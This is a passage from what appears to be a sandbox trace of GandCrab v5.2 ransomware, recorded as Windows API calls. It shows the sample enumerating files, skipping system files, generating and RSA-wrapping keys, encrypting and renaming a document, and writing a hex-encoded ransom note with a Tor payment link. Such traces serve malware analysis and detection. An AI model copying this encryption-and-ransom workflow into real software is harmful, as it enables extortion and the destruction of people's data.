(lpString1="8K_dM0xOUIdny.docx", lpString2="iconcache.db") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="bootsect.bak") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="boot.ini") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="ntuser.dat.log") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="thumbs.db") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="CRAB-DECRYPT.html") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="ntldr") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="NTDETECT.COM") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="Bootfont.bin") returned -1 [0089.849] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned 73 [0089.849] lstrlenW (lpString=".docx") returned 5 [0089.849] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.849] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0089.849] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.849] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.849] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\8k_dm0xouidny.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0089.850] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.850] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0089.850] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.851] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.852] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.852] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.852] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.852] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0089.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.852] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.852] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.853] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.854] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.854] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.854] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.854] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0089.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.854] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.854] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.854] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.855] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.856] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503838) returned 1 [0089.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.856] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.857] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.857] GetLastError () returned 0x0 [0089.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.857] CryptDestroyKey (hKey=0x503838) returned 1 [0089.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.857] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.857] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.858] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5032f8) returned 1 [0089.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.859] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.859] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.859] GetLastError () returned 0x0 [0089.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.859] CryptDestroyKey (hKey=0x5032f8) returned 1 [0089.859] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.859] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.859] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.859] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.860] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x144da, lpOverlapped=0x0) returned 1 [0089.866] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffebb26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.866] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x144da, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x144da, lpOverlapped=0x0) returned 1 [0089.867] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0089.869] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.872] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.873] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.873] CloseHandle (hObject=0x2bc) returned 1 [0089.873] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\8k_dm0xouidny.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\8k_dm0xouidny.docx.titwmvjl"), dwFlags=0x1) returned 1 [0089.874] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.874] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.874] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0089.874] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0089.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock" [0089.874] lstrlenW (lpString=".titwmvjl") returned 9 [0089.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock") returned 79 [0089.874] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.874] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0089.875] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\d2ca4a09d2ca4deb61a.lock") returned 79 [0089.875] lstrlenW (lpString=".lock") returned 5 [0089.875] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.875] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0089.875] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.875] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.875] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.875] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0089.875] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0089.875] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt" [0089.875] lstrlenW (lpString=".titwmvjl") returned 9 [0089.875] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt") returned 75 [0089.875] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.875] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0089.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt") returned 75 [0089.876] lstrlenW (lpString=".txt") returned 4 [0089.876] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.876] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0089.876] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0089.876] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt") returned 75 [0089.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\TITWMVJL-DECRYPT.txt") returned 75 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0089.876] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0089.876] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.876] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.876] lstrcmpW (lpString1="u1aeOBLb_6Tqy6I", lpString2=".") returned 1 [0089.877] lstrcmpW (lpString1="u1aeOBLb_6Tqy6I", lpString2="..") returned 1 [0089.877] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="u1aeOBLb_6Tqy6I" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I" [0089.877] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\" [0089.877] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.877] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.878] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.878] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.878] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\\\TITWMVJL-DECRYPT.txt") returned 92 [0089.878] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0089.878] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x7